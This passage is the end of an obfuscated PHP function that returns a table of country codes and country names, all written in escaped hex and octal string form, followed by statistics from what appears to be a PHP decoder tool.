"\x4b\x49" => "\x4b\151\162\151\x62\141\x74\x69",
"\113\120" => "\113\x6f\162\x65\x61\54\x20\116\x6f\162\164\x68",
"\x4b\122" => "\x4b\157\162\145\141\54\x20\x53\x6f\165\x74\x68",
"\113\x57" => "\x4b\165\x77\141\x69\x74",
"\113\x47" => "\113\x79\x72\x67\x79\172\163\x74\141\156",
"\x4c\x41" => "\x4c\x61\x6f\x73",
"\x4c\x56" => "\x4c\141\x74\166\x69\141",
"\x4c\102" => "\114\145\142\x61\156\157\156",
"\x4c\x53" => "\x4c\x65\x73\157\164\x68\157",
"\114\122" => "\114\x69\142\x65\x72\x69\x61",
"\114\x59" => "\x4c\151\x62\171\141",
"\x4c\111" =>
"\114\x69\x65\143\150\x74\x65\156\163\164\x65\x69\x6e",
"\114\124" => "\x4c\x69\164\150\x75\141\x6e\151\x61",
"\114\x55" => "\114\x75\170\x65\x6d\x62\157\165\162\147",
"\x4d\107" => "\x4d\x61\144\141\147\x61\163\143\141\x72",
"\115\127" => "\115\141\x6c\x61\167\151",
"\x4d\131" => "\115\x61\154\141\171\163\151\141",
"\115\126" => "\115\x61\154\144\x69\x76\x65\x73",
"\115\x4c" => "\x4d\x61\x6c\151",
"\115\124" => "\x4d\141\154\164\x61",
"\115\110" =>
"\x4d\141\x72\163\x68\x61\x6c\154\40\x49\x73\x6c\x61\x6e\x64\163",
"\x4d\x52" => "\115\141\165\162\151\x74\141\156\151\141",
"\115\125" => "\115\141\165\x72\151\x74\151\165\x73",
"\115\x58" => "\115\145\x78\x69\x63\157",
"\106\x4d" => "\115\151\x63\x72\157\156\x65\163\151\x61",
"\115\104" => "\x4d\157\x6c\144\157\x76\x61",
"\x4d\x43" => "\115\157\156\x61\x63\x6f",
"\x4d\x4e" => "\115\157\156\x67\157\x6c\x69\141",
"\x4d\105" => "\115\157\x6e\164\145\x6e\145\147\162\157",
"\x4d\x41" => "\115\x6f\x72\157\x63\x63\x6f",
"\x4d\132" => "\115\x6f\x7a\141\x6d\x62\x69\x71\165\145",
"\x4d\115" => "\x4d\x79\141\156\x6d\x61\x72",
"\x4e\x41" => "\116\141\x6d\x69\142\x69\x61",
"\116\x52" => "\116\x61\165\162\165",
"\x4e\120" => "\x4e\145\160\141\154",
"\116\114" => "\x4e\145\164\x68\145\x72\x6c\141\156\144\163",
"\x4e\x5a" => "\116\145\167\40\x5a\x65\141\154\141\x6e\x64",
"\x4e\x49" => "\116\151\143\x61\x72\x61\147\165\141",
"\x4e\x45" => "\x4e\x69\147\145\162",
"\x4e\x47" => "\x4e\x69\x67\x65\162\151\x61",
"\115\x4b" =>
"\116\157\162\164\150\x20\115\x61\143\x65\x64\x6f\x6e\x69\141",
"\x4e\117" => "\x4e\x6f\162\167\141\x79",
"\x4f\115" => "\117\155\x61\x6e",
"\120\113" => "\x50\x61\x6b\151\163\x74\x61\x6e",
"\x50\127" => "\x50\141\x6c\x61\165",
"\120\123" => "\x50\x61\154\x65\x73\164\x69\x6e\145",
"\120\x41" => "\120\x61\x6e\141\x6d\x61",
"\x50\107" =>
"\x50\x61\160\165\141\x20\x4e\x65\167\x20\x47\x75\151\156\145\x61",
"\x50\131" => "\120\141\x72\x61\x67\x75\141\x79",
"\x50\105" => "\x50\145\162\x75",
"\x50\110" => "\x50\x68\151\154\x69\x70\160\151\156\x65\163",
"\x50\x4c" => "\x50\157\154\x61\156\x64",
"\x50\124" => "\120\157\x72\x74\x75\x67\141\154",
"\x51\x41" => "\x51\x61\164\141\x72",
"\x52\105" => "\x52\303\xa9\x75\x6e\151\157\x6e",
"\x52\117" => "\122\x6f\155\x61\156\x69\x61",
"\122\125" => "\122\165\163\x73\151\141",
"\x52\x57" => "\x52\167\141\156\144\141",
"\x57\123" => "\123\141\x6d\157\x61",
"\123\115" => "\x53\141\156\40\x4d\x61\162\151\156\x6f",
"\123\124" =>
"\x53\141\157\x20\x54\x6f\x6d\x65\40\141\156\x64\x20\120\162\x69\x6e\143\151\x70\145",
"\123\x41" => "\x53\x61\x75\x64\x69\40\x41\162\141\x62\x69\141",
"\123\116" => "\x53\x65\x6e\x65\x67\x61\x6c",
"\122\123" => "\123\x65\162\142\x69\141",
"\123\x43" => "\x53\145\171\x63\x68\145\154\154\x65\163",
"\123\114" => "\x53\151\145\162\162\141\40\x4c\x65\157\x6e\145",
"\123\x47" => "\x53\151\156\x67\141\160\x6f\x72\145",
"\x53\113" => "\x53\x6c\157\166\x61\153\x69\141",
"\x53\111" => "\x53\x6c\157\x76\x65\x6e\151\141",
"\x53\x42" =>
"\x53\157\154\x6f\x6d\157\156\x20\111\163\x6c\141\156\x64\163",
"\123\117" => "\123\x6f\x6d\141\x6c\x69\x61",
"\132\101" => "\x53\x6f\x75\164\x68\40\101\146\162\x69\143\141",
"\123\x53" => "\x53\157\165\164\150\40\123\165\144\141\x6e",
"\x45\123" => "\123\160\141\x69\156",
"\x4c\113" => "\x53\x72\151\40\114\x61\156\153\141",
"\x53\x44" => "\x53\x75\x64\x61\x6e",
"\123\122" => "\x53\x75\x72\151\x6e\x61\x6d\x65",
"\123\132" => "\123\x77\145\144\x65\x6e",
"\x43\110" => "\123\167\151\164\172\145\162\154\141\x6e\144",
"\x53\131" => "\123\x79\x72\x69\141",
"\x54\x57" => "\x54\x61\151\167\x61\x6e",
"\124\112" => "\124\141\x6a\x69\153\151\163\x74\141\156",
"\x54\132" => "\124\141\156\x7a\141\x6e\x69\x61",
"\124\110" => "\x54\150\141\x69\x6c\141\156\x64",
"\124\x4c" => "\124\151\x6d\157\162\55\x4c\145\163\164\145",
"\124\x47" => "\124\157\x67\157",
"\x54\x4f" => "\x54\x6f\156\x67\141",
"\124\124" =>
"\x54\x72\x69\x6e\x69\x64\x61\x64\x20\141\156\144\40\x54\157\142\141\147\157",
"\124\x4e" => "\124\165\x6e\151\163\x69\x61",
"\x54\122" => "\x54\165\162\153\145\171",
"\124\115" => "\124\x75\162\153\155\x65\x6e\x69\x73\164\141\x6e",
"\x54\126" => "\x54\165\x76\x61\154\x75",
"\125\x47" => "\x55\x67\x61\156\x64\141",
"\125\x41" => "\x55\153\x72\141\151\156\x65",
"\x41\x45" =>
"\125\x6e\x69\x74\145\144\40\x41\162\141\142\x20\105\x6d\x69\x72\x61\164\x65\x73",
"\107\102" =>
"\x55\x6e\x69\164\x65\144\40\113\x69\x6e\147\144\x6f\155",
"\x55\123" => "\125\x6e\151\164\x65\144\40\x53\164\141\x74\x65\163",
"\x55\131" => "\125\162\x75\147\x75\141\x79",
"\125\x5a" => "\125\172\142\x65\x6b\151\163\164\141\156",
"\x56\125" => "\x56\x61\x6e\x75\141\x74\165",
"\x56\105" => "\x56\x65\x6e\x65\172\x75\145\x6c\141",
"\126\x4e" => "\x56\151\x65\x74\156\141\x6d",
"\131\x45" => "\131\x65\x6d\x65\x6e",
"\132\x4d" => "\x5a\141\155\142\x69\x61",
"\132\x57" => "\132\151\155\x62\x61\142\x77\145",
];
return $d55f1;
}
}
Function Calls
None |
Stats
MD5 | ba4bd04145e196945252dbb7e9cbdbfe |
Eval Count | 0 |
Decode Time | 99 ms |